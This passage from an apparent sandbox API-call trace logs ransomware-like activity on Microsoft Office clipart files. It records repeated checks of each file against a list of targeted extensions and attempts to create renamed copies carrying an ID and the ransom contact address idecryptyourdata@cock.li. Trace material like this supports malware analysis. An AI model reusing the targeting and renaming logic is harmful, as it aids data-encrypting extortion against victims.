(lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01682_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01682_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.903] CloseHandle (hObject=0x378) returned 1 [0169.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01682_.WMF") returned 68 [0169.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01682_.WMF") returned 68 [0169.903] lstrlenW (lpString=".doc") returned 4 [0169.903] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0169.903] lstrlenW (lpString=".docx") returned 5 [0169.903] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0169.903] lstrlenW (lpString=".pdf") returned 4 [0169.903] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0169.903] lstrlenW (lpString=".xls") returned 4 [0169.903] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0169.903] lstrlenW (lpString=".xlsx") returned 5 [0169.903] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0169.903] lstrlenW (lpString=".ppt") returned 4 [0169.904] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0169.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01682_.WMF") returned 68 [0169.904] lstrlenW (lpString=".zip") returned 4 [0169.904] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0169.904] lstrlenW (lpString=".rar") returned 4 [0169.904] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0169.904] lstrlenW (lpString=".bz2") returned 4 [0169.904] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0169.904] lstrlenW (lpString=".7z") returned 3 [0169.904] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0169.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01682_.WMF") returned 68 [0169.904] lstrlenW (lpString=".dbf") returned 4 [0169.904] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0169.905] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01682_.WMF") returned 68 [0169.905] lstrlenW (lpString=".1cd") returned 4 [0169.905] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0169.905] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01682_.WMF") returned 68 [0169.905] lstrlenW (lpString=".jpg") returned 4 [0169.905] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0169.905] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01682_.WMF") returned 68 [0169.905] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01682_.WMF") returned 68 [0169.905] lstrlenW (lpString=".doc") returned 4 [0169.905] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0169.905] lstrlenW (lpString=".docx") returned 5 [0169.905] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0169.905] lstrlenW (lpString=".pdf") returned 4 [0169.905] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0169.905] lstrlenW (lpString=".xls") returned 4 [0169.905] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0169.905] lstrlenW (lpString=".xlsx") returned 5 [0169.905] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0169.905] lstrlenW (lpString=".ppt") returned 4 [0169.905] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0169.905] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01682_.WMF") returned 68 [0169.905] lstrlenW (lpString=".zip") returned 4 [0169.906] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0169.906] lstrlenW (lpString=".rar") returned 4 [0169.906] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0169.906] lstrlenW (lpString=".bz2") returned 4 [0169.906] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0169.906] lstrlenW (lpString=".7z") returned 3 [0169.906] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0169.906] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01682_.WMF") returned 68 [0169.906] lstrlenW (lpString=".dbf") returned 4 [0169.906] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0169.906] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01682_.WMF") returned 68 [0169.906] lstrlenW (lpString=".1cd") returned 4 [0169.906] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0169.906] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01682_.WMF") returned 68 [0169.906] lstrlenW (lpString=".jpg") returned 4 [0169.906] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0169.907] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0169.907] lstrlenW (lpString="NA01701_.WMF") returned 12 [0169.907] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01701_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01701_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0169.908] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x377ff14 | out: lpFileSize=0x377ff14*=5316) returned 1 [0169.908] CloseHandle (hObject=0x378) returned 1 [0169.908] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01701_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01701_.wmf")) returned 0x220 [0169.908] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01701_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01701_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0169.908] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01701_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01701_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0169.908] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.909] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.909] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01701_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01701_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.909] CloseHandle (hObject=0x378) returned 1 [0169.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01701_.WMF") returned 68 [0169.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01701_.WMF") returned 68 [0169.909] lstrlenW (lpString=".doc") returned 4 [0169.909] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0169.909] lstrlenW (lpString=".docx") returned 5 [0169.909] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0169.909] lstrlenW (lpString=".pdf") returned 4 [0169.910] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0169.910] lstrlenW (lpString=".xls") returned 4 [0169.910] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0169.910] lstrlenW (lpString=".xlsx") returned 5 [0169.910] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0169.910] lstrlenW (lpString=".ppt") returned 4 [0169.910] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0169.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01701_.WMF") returned 68 [0169.910] lstrlenW (lpString=".zip") returned 4 [0169.910] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0169.910] lstrlenW (lpString=".rar") returned 4 [0169.910] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0169.910] lstrlenW (lpString=".bz2") returned 4 [0169.910] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0169.910] lstrlenW (lpString=".7z") returned 3 [0169.910] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0169.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01701_.WMF") returned 68 [0169.910] lstrlenW (lpString=".dbf") returned 4 [0169.910] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0169.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01701_.WMF") returned 68 [0169.910] lstrlenW (lpString=".1cd") returned 4 [0169.910] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0169.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01701_.WMF") returned 68 [0169.913] lstrlenW (lpString=".jpg") returned 4 [0169.913] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0169.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01701_.WMF") returned 68 [0169.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01701_.WMF") returned 68 [0169.913] lstrlenW (lpString=".doc") returned 4 [0169.913] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0169.913] lstrlenW (lpString=".docx") returned 5 [0169.913] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0169.913] lstrlenW (lpString=".pdf") returned 4 [0169.913] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0169.913] lstrlenW (lpString=".xls") returned 4 [0169.913] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0169.913] lstrlenW (lpString=".xlsx") returned 5 [0169.913] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0169.913] lstrlenW (lpString=".ppt") returned 4 [0169.913] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0169.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01701_.WMF") returned 68 [0169.913] lstrlenW (lpString=".zip") returned 4 [0169.913] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0169.913] lstrlenW (lpString=".rar") returned 4 [0169.914] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0169.914] lstrlenW (lpString=".bz2") returned 4 [0169.914] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0169.914] lstrlenW (lpString=".7z") returned 3 [0169.914] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0169.914] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01701_.WMF") returned 68 [0169.914] lstrlenW (lpString=".dbf") returned 4 [0169.914] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0169.914] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01701_.WMF") returned 68 [0169.914] lstrlenW (lpString=".1cd") returned 4 [0169.914] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0169.914] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01701_.WMF") returned 68 [0169.914] lstrlenW (lpString=".jpg") returned 4 [0169.914] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0169.914] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0169.914] lstrlenW (lpString="NA01848_.WMF") returned 12 [0169.914] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01848_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01848_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0169.916] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x377ff14 | out: lpFileSize=0x377ff14*=1120) returned 1 [0169.916] CloseHandle (hObject=0x378) returned 1 [0169.916] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01848_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01848_.wmf")) returned 0x220 [0169.916] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01848_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01848_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0169.916] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01848_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01848_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0169.917] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.917] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01848_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01848_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.917] CloseHandle (hObject=0x378) returned 1 [0169.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01848_.WMF") returned 68 [0169.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01848_.WMF") returned 68 [0169.918] lstrlenW (lpString=".doc") returned 4 [0169.918] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0169.918] lstrlenW (lpString=".docx") returned 5 [0169.918] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0169.918] lstrlenW (lpString=".pdf") returned 4 [0169.918] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0169.918] lstrlenW (lpString=".xls") returned 4 [0169.918] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0169.918] lstrlenW (lpString=".xlsx") returned 5 [0169.918] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0169.918] lstrlenW (lpString=".ppt") returned 4 [0169.918] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0169.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01848_.WMF") returned 68 [0169.918] lstrlenW (lpString=".zip") returned 4 [0169.918] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0169.918] lstrlenW (lpString=".rar") returned 4 [0169.918] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0169.918] lstrlenW (lpString=".bz2") returned 4 [0169.918] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0169.918] lstrlenW (lpString=".7z") returned 3 [0169.918] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0170.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01848_.WMF") returned 68 [0170.206] lstrlenW (lpString=".dbf") returned 4 [0170.206] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0170.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01848_.WMF") returned 68 [0170.206] lstrlenW (lpString=".1cd") returned 4 [0170.206] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0170.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01848_.WMF") returned 68 [0170.206] lstrlenW (lpString=".jpg") returned 4 [0170.206] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0170.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01848_.WMF") returned 68 [0170.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01848_.WMF") returned 68 [0170.206] lstrlenW (lpString=".doc") returned 4 [0170.206] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0170.206] lstrlenW (lpString=".docx") returned 5 [0170.206] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0170.206] lstrlenW (lpString=".pdf") returned 4 [0170.206] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0170.206] lstrlenW (lpString=".xls") returned 4 [0170.206] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0170.206] lstrlenW (lpString=".xlsx") returned 5 [0170.206] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0170.206] lstrlenW (lpString=".ppt") returned 4 [0170.206] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0170.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01848_.WMF") returned 68 [0170.207] lstrlenW (lpString=".zip") returned 4 [0170.207] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0170.207] lstrlenW (lpString=".rar") returned 4 [0170.207] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0170.207] lstrlenW (lpString=".bz2") returned 4 [0170.207] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0170.207] lstrlenW (lpString=".7z") returned 3 [0170.207] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0170.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01848_.WMF") returned 68 [0170.207] lstrlenW (lpString=".dbf") returned 4 [0170.207] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0170.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01848_.WMF") returned 68 [0170.207] lstrlenW (lpString=".1cd") returned 4 [0170.207] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0170.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01848_.WMF") returned 68 [0170.207] lstrlenW (lpString=".jpg") returned 4 [0170.207] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0170.207] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0170.207] lstrlenW (lpString="NA02368_.WMF") returned 12 [0170.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02368_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02368_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x52c [0170.525] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x377ff14 | out: lpFileSize=0x377ff14*=3368) returned 1 [0170.525] CloseHandle (hObject=0x52c) returned 1 [0170.525] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02368_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02368_.wmf")) returned 0x220 [0170.742] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02368_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02368_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0170.922] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02368_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02368_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x514 [0171.106] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.113] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.113] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02368_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02368_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.165] CloseHandle (hObject=0x514) returned 1 [0171.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02368_.WMF") returned 68 [0171.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02368_.WMF") returned 68 [0171.165] lstrlenW (lpString=".doc") returned 4 [0171.165] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0171.165] lstrlenW (lpString=".docx") returned 5 [0171.165] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0171.165] lstrlenW (lpString=".pdf") returned 4 [0171.165] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0171.165] lstrlenW (lpString=".xls") returned 4 [0171.165] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0171.165] lstrlenW (lpString=".xlsx") returned 5 [0171.166] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0171.166] lstrlenW (lpString=".ppt") returned 4 [0171.166] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0171.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02368_.WMF") returned 68 [0171.166] lstrlenW (lpString=".zip") returned 4 [0171.166] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0171.166] lstrlenW (lpString=".rar") returned 4 [0171.166] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0171.166] lstrlenW (lpString=".bz2") returned 4 [0171.166] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0171.166] lstrlenW (lpString=".7z") returned 3 [0171.166] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0171.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02368_.WMF") returned 68 [0171.166] lstrlenW (lpString=".dbf") returned 4 [0171.166] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0171.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02368_.WMF") returned 68 [0171.166] lstrlenW (lpString=".1cd") returned 4 [0171.166] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0171.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02368_.WMF") returned 68 [0171.166] lstrlenW (lpString=".jpg") returned 4 [0171.166] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0171.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02368_.WMF") returned 68 [0171.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02368_.WMF") returned 68 [0171.167] lstrlenW (lpString=".doc") returned 4 [0171.167] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0171.167] lstrlenW (lpString=".docx") returned 5 [0171.167] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0171.167] lstrlenW (lpString=".pdf") returned 4 [0171.167] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0171.167] lstrlenW (lpString=".xls") returned 4 [0171.167] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0171.167] lstrlenW (lpString=".xlsx") returned 5 [0171.167] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0171.167] lstrlenW (lpString=".ppt") returned 4 [0171.167] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0171.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02368_.WMF") returned 68 [0171.167] lstrlenW (lpString=".zip") returned 4 [0171.167] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0171.167] lstrlenW (lpString=".rar") returned 4 [0171.167] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0171.167] lstrlenW (lpString=".bz2") returned 4 [0171.167] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0171.167] lstrlenW (lpString=".7z") returned 3 [0171.167] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0171.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02368_.WMF") returned 68 [0171.167] lstrlenW (lpString=".dbf") returned 4 [0171.168] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0171.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02368_.WMF") returned 68 [0171.168] lstrlenW (lpString=".1cd") returned 4 [0171.168] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0171.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02368_.WMF") returned 68 [0171.168] lstrlenW (lpString=".jpg") returned 4 [0171.168] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0171.168] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0171.168] lstrlenW (lpString="NA02371_.WMF") returned 12 [0171.168] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02371_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02371_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0171.314] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x377ff14 | out: lpFileSize=0x377ff14*=3188) returned 1 [0171.314] CloseHandle (hObject=0x414) returned 1 [0171.314] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02371_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02371_.wmf")) returned 0x220 [0171.316] GetFileAttributesW (lpFileName="C:\\Program 